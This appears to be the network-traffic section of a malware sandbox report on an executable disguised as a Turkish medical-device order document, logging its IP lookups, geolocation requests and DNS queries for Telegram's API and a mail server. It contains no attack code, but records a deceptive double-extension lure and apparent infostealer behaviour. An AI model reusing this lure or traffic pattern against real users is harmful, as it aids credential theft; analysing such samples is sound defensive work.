                                                                                                Dec 6, 2024 09:58:22.892209053 CET192.168.2.71.1.1.10xc118Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                Dec 6, 2024 09:58:31.213325024 CET192.168.2.71.1.1.10x524Standard query (0)mail.adendanismanlik.com.trA (IP address)IN (0x0001)false

                                                                                                DNS Answers

                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                Dec 6, 2024 09:57:55.320837975 CET1.1.1.1192.168.2.70x29f7No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                Dec 6, 2024 09:57:55.320837975 CET1.1.1.1192.168.2.70x29f7No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                Dec 6, 2024 09:57:55.320837975 CET1.1.1.1192.168.2.70x29f7No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                Dec 6, 2024 09:57:55.320837975 CET1.1.1.1192.168.2.70x29f7No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                Dec 6, 2024 09:57:55.320837975 CET1.1.1.1192.168.2.70x29f7No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                Dec 6, 2024 09:57:55.320837975 CET1.1.1.1192.168.2.70x29f7No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                Dec 6, 2024 09:57:57.326587915 CET1.1.1.1192.168.2.70xfe09No error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                Dec 6, 2024 09:57:57.326587915 CET1.1.1.1192.168.2.70xfe09No error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                Dec 6, 2024 09:58:23.030009031 CET1.1.1.1192.168.2.70xc118No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                Dec 6, 2024 09:58:32.007359982 CET1.1.1.1192.168.2.70x524No error (0)mail.adendanismanlik.com.tradendanismanlik.com.trCNAME (Canonical name)IN (0x0001)false
                                                                                                Dec 6, 2024 09:58:32.007359982 CET1.1.1.1192.168.2.70x524No error (0)adendanismanlik.com.tr77.245.159.14A (IP address)IN (0x0001)false

                                                                                                HTTP Request Dependency Graph

                                                                                                • reallyfreegeoip.org
                                                                                                • api.telegram.org
                                                                                                • checkip.dyndns.org

                                                                                                HTTP Packets

                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.2.749702193.122.6.168807608C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Dec 6, 2024 09:57:55.456281900 CET151OUTGET / HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                Host: checkip.dyndns.org
                                                                                                Connection: Keep-Alive
                                                                                                Dec 6, 2024 09:57:56.725158930 CET321INHTTP/1.1 200 OK
                                                                                                Date: Fri, 06 Dec 2024 08:57:56 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 104
                                                                                                Connection: keep-alive
                                                                                                Cache-Control: no-cache
                                                                                                Pragma: no-cache
                                                                                                X-Request-ID: ca0b2c9e7ced88f5de6c3ff4937a323b
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>
                                                                                                Dec 6, 2024 09:57:56.730031013 CET127OUTGET / HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                Host: checkip.dyndns.org
                                                                                                Dec 6, 2024 09:57:57.135261059 CET321INHTTP/1.1 200 OK
                                                                                                Date: Fri, 06 Dec 2024 08:57:56 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 104
                                                                                                Connection: keep-alive
                                                                                                Cache-Control: no-cache
                                                                                                Pragma: no-cache
                                                                                                X-Request-ID: 85e6e004c3e776db1727dd869053fe5e
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>
                                                                                                Dec 6, 2024 09:57:59.010875940 CET127OUTGET / HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                Host: checkip.dyndns.org
                                                                                                Dec 6, 2024 09:57:59.416158915 CET321INHTTP/1.1 200 OK
                                                                                                Date: Fri, 06 Dec 2024 08:57:59 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 104
                                                                                                Connection: keep-alive
                                                                                                Cache-Control: no-cache
                                                                                                Pragma: no-cache
                                                                                                X-Request-ID: 40f4b2951ce381d2b638842f03bd52a6
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                1192.168.2.749714193.122.6.168807608C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Dec 6, 2024 09:58:01.203236103 CET127OUTGET / HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                Host: checkip.dyndns.org
                                                                                                Dec 6, 2024 09:58:02.471240044 CET321INHTTP/1.1 200 OK
                                                                                                Date: Fri, 06 Dec 2024 08:58:02 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 104
                                                                                                Connection: keep-alive
                                                                                                Cache-Control: no-cache
                                                                                                Pragma: no-cache
                                                                                                X-Request-ID: 562f1ca52bd764fd84895b906bcb0aea
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                2192.168.2.749721193.122.6.168807608C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Dec 6, 2024 09:58:04.267254114 CET151OUTGET / HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                Host: checkip.dyndns.org
                                                                                                Connection: Keep-Alive
                                                                                                Dec 6, 2024 09:58:05.534806967 CET321INHTTP/1.1 200 OK
                                                                                                Date: Fri, 06 Dec 2024 08:58:05 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 104
                                                                                                Connection: keep-alive
                                                                                                Cache-Control: no-cache
                                                                                                Pragma: no-cache
                                                                                                X-Request-ID: f47fa2a29ee75db7b8e298ad7e2f340b
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                3192.168.2.749731193.122.6.168807608C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Dec 6, 2024 09:58:07.322391987 CET151OUTGET / HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                Host: checkip.dyndns.org
                                                                                                Connection: Keep-Alive
                                                                                                Dec 6, 2024 09:58:08.591383934 CET321INHTTP/1.1 200 OK
                                                                                                Date: Fri, 06 Dec 2024 08:58:08 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 104
                                                                                                Connection: keep-alive
                                                                                                Cache-Control: no-cache
                                                                                                Pragma: no-cache
                                                                                                X-Request-ID: 2541af45a3401331a10e65f8837aec30
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                4192.168.2.749740193.122.6.168807608C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Dec 6, 2024 09:58:10.377443075 CET151OUTGET / HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                Host: checkip.dyndns.org
                                                                                                Connection: Keep-Alive
                                                                                                Dec 6, 2024 09:58:11.644012928 CET321INHTTP/1.1 200 OK
                                                                                                Date: Fri, 06 Dec 2024 08:58:11 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 104
                                                                                                Connection: keep-alive
                                                                                                Cache-Control: no-cache
                                                                                                Pragma: no-cache
                                                                                                X-Request-ID: ca1248bd9a60278d165f08d5aac25c18
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                5192.168.2.749751193.122.6.168807608C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Dec 6, 2024 09:58:13.444483042 CET151OUTGET / HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                Host: checkip.dyndns.org
                                                                                                Connection: Keep-Alive
                                                                                                Dec 6, 2024 09:58:14.711546898 CET321INHTTP/1.1 200 OK
                                                                                                Date: Fri, 06 Dec 2024 08:58:14 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 104
                                                                                                Connection: keep-alive
                                                                                                Cache-Control: no-cache
                                                                                                Pragma: no-cache
                                                                                                X-Request-ID: 0fdbcbce02bf25268c9b6c85d1317031
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                6192.168.2.749762193.122.6.168807608C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Dec 6, 2024 09:58:16.495982885 CET151OUTGET / HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                Host: checkip.dyndns.org
                                                                                                Connection: Keep-Alive
                                                                                                Dec 6, 2024 09:58:17.823139906 CET321INHTTP/1.1 200 OK
                                                                                                Date: Fri, 06 Dec 2024 08:58:17 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 104
                                                                                                Connection: keep-alive
                                                                                                Cache-Control: no-cache
                                                                                                Pragma: no-cache
                                                                                                X-Request-ID: d3be67da5b17078e11e829f279f151ba
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                7192.168.2.749771193.122.6.168807608C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Dec 6, 2024 09:58:19.710773945 CET151OUTGET / HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                Host: checkip.dyndns.org
                                                                                                Connection: Keep-Alive
                                                                                                Dec 6, 2024 09:58:21.176299095 CET321INHTTP/1.1 200 OK
                                                                                                Date: Fri, 06 Dec 2024 08:58:20 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 104
                                                                                                Connection: keep-alive
                                                                                                Cache-Control: no-cache
                                                                                                Pragma: no-cache
                                                                                                X-Request-ID: 1c3d35ab1665d4d99dc767286c2cbf17
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                HTTPS Proxied Packets

                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.2.749704172.67.177.1344437608C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-12-06 08:57:58 UTC85OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                Host: reallyfreegeoip.org
                                                                                                Connection: Keep-Alive
                                                                                                2024-12-06 08:57:58 UTC878INHTTP/1.1 200 OK
                                                                                                Date: Fri, 06 Dec 2024 08:57:58 GMT
                                                                                                Content-Type: text/xml
                                                                                                Content-Length: 362
                                                                                                Connection: close
                                                                                                Cache-Control: max-age=31536000
                                                                                                CF-Cache-Status: HIT
                                                                                                Age: 352901
                                                                                                Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                Accept-Ranges: bytes
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BvbaQbv9lRAZIW%2FowYZs4tcL2RwE%2B%2F8BaVvUz2QjAyaBAQ3YIAJlyBxmD7a1FAswH2RiLOjFEE0kZNvULtqI2n710272sYk7nrJMEGiigfiR5pVFhUbI%2BFF4Eo6ibpHnOZu8VPDZ"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8edb124ea8a05590-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1580&min_rtt=1573&rtt_var=604&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1791411&cwnd=142&unsent_bytes=0&cid=b8889bf5285671bf&ts=450&x=0"
                                                                                                2024-12-06 08:57:58 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                1192.168.2.749707172.67.177.1344437608C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-12-06 08:58:00 UTC61OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                Host: reallyfreegeoip.org
                                                                                                2024-12-06 08:58:01 UTC886INHTTP/1.1 200 OK
                                                                                                Date: Fri, 06 Dec 2024 08:58:00 GMT
                                                                                                Content-Type: text/xml
                                                                                                Content-Length: 362
                                                                                                Connection: close
                                                                                                Cache-Control: max-age=31536000
                                                                                                CF-Cache-Status: HIT
                                                                                                Age: 352903
                                                                                                Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                Accept-Ranges: bytes
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ucZbaV1O%2BW8TtUVG1DZ%2B%2F4p3ha6XaQY%2FDnOk%2FE3g7V5Y%2BlNlIuY%2BqUYTHj0nIWXx1Mg5GPC2MpvqDRdrEqeQnCu10t%2FGct9crt5cGnzg1fv4PH6ZODjfkAyaDwWX83B9mVICD9Wr"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8edb125bb8d74265-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1829&min_rtt=1827&rtt_var=689&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1583514&cwnd=195&unsent_bytes=0&cid=6210abd135f458f8&ts=452&x=0"
                                                                                                2024-12-06 08:58:01 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                2192.168.2.749715172.67.177.1344437608C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-12-06 08:58:03 UTC85OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                Host: reallyfreegeoip.org
                                                                                                Connection: Keep-Alive
                                                                                                2024-12-06 08:58:04 UTC882INHTTP/1.1 200 OK
                                                                                                Date: Fri, 06 Dec 2024 08:58:03 GMT
                                                                                                Content-Type: text/xml
                                                                                                Content-Length: 362
                                                                                                Connection: close
                                                                                                Cache-Control: max-age=31536000
                                                                                                CF-Cache-Status: HIT
                                                                                                Age: 352906
                                                                                                Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                Accept-Ranges: bytes
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5d9W7DJDxf521YEqLGDNcZHvG4Q2OpzQ%2FTagw14Mo6gMvKzW3vMsUwO3L3FejeXEZStZb8N%2BwUq6n8RenCAwnQAUFioI542qdGYGhM%2BHZKPHFh%2BOA6hEyRmVOdJ%2BY2esvYWQh%2BrL"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8edb126ecb2442a3-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1831&min_rtt=1820&rtt_var=705&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1528795&cwnd=160&unsent_bytes=0&cid=8fce38d5e5f12c4d&ts=459&x=0"
                                                                                                2024-12-06 08:58:04 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                3192.168.2.749727172.67.177.1344437608C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-12-06 08:58:06 UTC61OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                Host: reallyfreegeoip.org
                                                                                                2024-12-06 08:58:07 UTC876INHTTP/1.1 200 OK
                                                                                                Date: Fri, 06 Dec 2024 08:58:07 GMT
                                                                                                Content-Type: text/xml
                                                                                                Content-Length: 362
                                                                                                Connection: close
                                                                                                Cache-Control: max-age=31536000
                                                                                                CF-Cache-Status: HIT
                                                                                                Age: 352910
                                                                                                Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                Accept-Ranges: bytes
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AGyuORN3OvjC4aEm8529IT6Olce891qlQOVQz3woe0tOKtw1Wy%2BW87K6sB03albr7loySQf6WBDiRP4cj7X624hsA%2BR8pixaJpCLfa1He0uAcZL3BHHqTIjpJjKzoRLIERN3Z%2BBt"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8edb1281fc4643fd-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1827&min_rtt=1822&rtt_var=694&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1564844&cwnd=213&unsent_bytes=0&cid=c1560b8fc7022a69&ts=454&x=0"
